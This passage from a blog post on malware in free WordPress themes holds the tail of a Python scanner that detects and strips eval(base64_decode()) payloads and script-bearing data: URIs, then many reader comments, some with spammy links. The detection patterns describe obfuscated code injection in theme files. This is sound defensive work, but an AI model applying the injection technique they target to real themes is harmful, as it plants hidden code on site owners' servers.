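        prefix = source[max(0, m.start() - 10):m.start()]
        evaled = 'eval' in prefix
        # Heuristic (assumption): executed code, or decoded HTML/links, is
        # the footer-injection pattern; anything else is left for review.
        suspicious = evaled or bool(re.search(r'<a\s|https?://', text, re.I))
        findings.append({'kind': 'php_base64_decode', 'decoded': text,
                         'evaled': evaled, 'suspicious': suspicious})
    for m in DATA_URI_RE.finditer(source):
        decoded = _decode(m.group('blob'))
        # data: URIs are normally binary images; flag only if the payload
        # actually contains markup or script.
        text = decoded.decode('latin-1') if decoded is not None else ''
        suspicious = bool(re.search(r'<(script|a|iframe)\b', text, re.I))
        findings.append({'kind': 'data_uri', 'decoded': text,
                         'evaled': False, 'suspicious': suspicious})
    return findings


def strip_eval_payloads(source):
    """Remove every eval(base64_decode('...')); statement, keeping the rest.

    Returns (cleaned_source, number_of_statements_removed).
    """
    return EVAL_WRAPPER_RE.subn('', source)


if __name__ == '__main__':
    for f in find_base64(SAMPLE_FOOTER):
        flag = 'SUSPICIOUS' if f['suspicious'] else 'ok'
        print(f"[{flag}] {f['kind']}: {f['decoded'][:60]!r}")
    cleaned, n = strip_eval_payloads(SAMPLE_FOOTER)
    print(f"removed {n} eval(base64_decode()) statement(s)")
```

Run it against a real theme by reading each .php file into `find_base64()` and reviewing the decoded text yourself before stripping anything; the eval() wrapper is the strong signal, while a base64 image in a data: URI is usually just an image, which is why the two kinds are reported separately rather than treated alike.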
Interestingly, sometimes free is more expensive. Thank you for this entertaining post :o)
I used to use free WordPress themes until several of my websites became infected with malicious code. It took me forever to clean the code from those websites. I learned my lesson. I deleted all of the bookmarks I had of websites that were offering free WordPress themes, and I bought the StudioPress Pro Package. It cost a lot of money, but it was well worth it. Not only do my websites look better but they perform better too because they are very well coded. If you must use a free WordPress theme, try StudioPress, they have a few free ones.
Hi.
This one is clean:
http://freewordpressthemedownloads.blogspot.com/
Great post! I never used free themes so far, but only because of their restrictive flexibility; I simply preferred to make my own designs in an online theme generator like Lubith and work in the code afterwards (when you do it yourself, it’s easy to figure out when/why/how things go wrong in the code). I never thought of verifying the source of pre-made themes to see what is going on back there.
Great article, thanks!
excellent info, very useful for me…
thanks,
http://www.eblogresources.com/
An absolutely mindbogglingly informative article and comments. Fortunately, I’m too dumb to look for free themes with a search engine and stick with the ones offered on my WP blog dashboard. I assume they’re all okay. Started looking for a paid theme recently, but was pretty disappointed when one vendor failed to answer the one question I had about it before I was willing to pay for it. That seemed kind of slack. Beautiful theme, though and perfect for my travel blog.
Hi All,
Please suggest a good theme(free) for the website of a High School that I own. Need something that looks premium,buying is not an option. Found these http://demo.wpzoom.com/academica/
http://newwpthemes.com/demo/iEducation/
Please suggest more options.
Thanks
wow… this is a BIG list to avoid..! I never knew before… You’re right, they do an “awesome” job to get on the first Google page. Offer a “looking good” theme but …
Thanks for sharing this…
Man alive … there should be some sorta medal for “above and beyond” … a terrific piece of work. Congrats. And thanks!
–@bentrem
I currently have a wordpress.com blog, and have been wanting to upgrade to a wordpress.org I have been looking into a new theme to go with it. I am careful when I download things, but I would have never seen the things you pointed out. It really makes me rethink how I was theme hunting.
Thank you for this great public service!
Guess with hundreds of comments, you don’t really need one more, however here is one more. You had me at 1. I’m new to WordPress, being a former 1&1 customer (locked into a super old version), but am looking for ways to make my blog visually interesting. I never would have realized the dangers you exposed. Thanks!
epaulstanley.com
A friend of mine is using Gameliso (referred to in point 3) and asked me to make some cosmetic changes to the site. One of these changes was to remove the footer links. I did this and am now locked out of the site. I can’t access it to change theme. All I get is a message saying ‘This theme is sponsored, all links in the footer should remain intact’.
Can anyone advise as to what I can do to gain access?
This is a great post with plenty of detail Ismail, thank you.
Dennis O’Brien just shared it in a WordPress Help and Share group on Facebook. I’m pleased I took the time to click through and read it. Years back people – dodgy developers! – did things like adding links in white text on a white page. I thought all these kinds of sneaky tricks had stopped long ago! This has been a great lesson for my continued education. :)
Great Post! Very Helpful…
Interesting post. I am pleased to come across this wonderful post. Thanks a ton for sharing the same.
Great article, Siobhan. I could tell you have spent a lot of time on this article and your patience in doing so deserves applause. I just wanted to check with you to see if the base64 encryption can be found out by using an anti-virus scanner. I have a feeling that the anti-virus software may not be able to detect these encryptions & will declare it as clean, in which event we will need to manually scan through the entire source code for inspection. So I just want to know how reliable the anti-virus scanners are in this regard.
Thanks again!
As a hand coding html5/css designer stepping into the WP waters, I experienced something that really spooked me out. Viewing an SE marketer’s website, I liked what I saw, did “view source” and found where I could download the theme, which happened to be free. That theme, and another theme that caught my eye, I uploaded to my Bluehost. A week later Bluehost sends an email saying they patched a timthumb file that they said was corrupt(?).
Kudos to Blue Host. Does GoDaddy do the same?
Lately I’ve been getting requests from prospective web design clients saying their WP was “hacked” and that they need a new website.
Your research (even tho a year later) has got me on edge with this. do you have an updated article for 4Q2012?
Great post. Now I’m gonna think twice before searching for FREE themes.
Just a matter of curiosity, if you search again for “free wordpress themes” you’ll get completely different results now, much more relevant (only a few malicious sites that you mentioned are still on the first page). We have to say thanks to the Google team and their recent Panda, Penguin and other updates regarding the quality of websites and search results. Regards!
Thank you for the information. It’s true I never search for WordPress themes outside the WordPress site for my website. I never thought that WordPress themes are available outside and that they would be free, it’s great. I will surely try from now onwards.
http://www.buy-arearugs.com/
Hi Siobhan, you are AWESOME! Thanks a bunch. I had no idea you could force malicious code out of hiding like that.
Awesome post! Now I only buy WordPress themes, thanks to you.
http://www.tecnigar.com
Thanks got your point about malicious code.
Found one in my theme footer and removed it successfully.
Thanks for the decoder links
It’s like a quandary, you can get a very pretty theme for free but it comes at a cost. I guess it is the Trojan Horse.
Well I have been warned and will now just buy paid themes and even then I will check the theme.
Thanks for the post.
Stumbled on to this from the Learn WP in One Week page. Created an account just to say how awesome this is! I have already learned SO much and I’m looking forward to all the helpful info.
Thanks!
Perfect article sure there is issue with free themes…good article…